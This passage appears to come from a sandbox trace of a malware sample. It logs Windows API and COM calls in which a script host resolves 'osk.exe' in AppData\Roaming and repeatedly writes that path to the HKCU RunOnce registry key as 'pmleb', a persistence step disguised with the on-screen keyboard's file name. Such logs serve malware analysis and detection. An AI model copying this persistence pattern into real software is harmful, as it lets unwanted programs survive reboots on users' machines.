cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.066] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1f [0081.066] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.066] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.066] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.066] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.066] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.066] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.066] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.066] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.066] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.066] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.067] RegCloseKey (hKey=0x280) returned 0x0 [0081.067] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.067] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.067] SetTimer (hWnd=0x20280, nIDEvent=0x209b, uElapse=0xa, lpTimerFunc=0x0) returned 0x209b [0081.067] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.079] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.079] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.079] KillTimer (hWnd=0x20280, uIDEvent=0x209b) returned 1 [0081.079] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.079] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.079] IUnknown:Release (This=0x787518) returned 0x1 [0081.079] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.080] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.080] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.080] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.080] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.080] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.080] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.080] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.080] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.080] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x20 [0081.080] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.080] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x21 [0081.080] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.081] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x20 [0081.081] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.081] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.081] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.081] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.081] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.082] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.082] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.082] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.082] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.082] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.082] RegCloseKey (hKey=0x280) returned 0x0 [0081.082] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.082] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.082] SetTimer (hWnd=0x20280, nIDEvent=0x209c, uElapse=0xa, lpTimerFunc=0x0) returned 0x209c [0081.083] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.094] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.094] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.094] KillTimer (hWnd=0x20280, uIDEvent=0x209c) returned 1 [0081.095] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.095] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.095] IUnknown:Release (This=0x787518) returned 0x1 [0081.095] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.095] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.095] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.095] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.095] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.095] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.095] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.095] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.095] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.096] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x21 [0081.096] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.096] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x22 [0081.096] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.097] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x21 [0081.097] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.097] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.097] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.097] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.097] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.097] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.097] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.097] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.098] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.098] RegCloseKey (hKey=0x280) returned 0x0 [0081.098] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.098] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.098] SetTimer (hWnd=0x20280, nIDEvent=0x209d, uElapse=0xa, lpTimerFunc=0x0) returned 0x209d [0081.098] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.110] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.110] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.110] KillTimer (hWnd=0x20280, uIDEvent=0x209d) returned 1 [0081.110] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.110] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.110] IUnknown:Release (This=0x787518) returned 0x1 [0081.111] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.111] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.111] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.111] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.111] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.111] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.111] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.111] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.111] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.111] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x22 [0081.111] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.111] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x23 [0081.111] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, 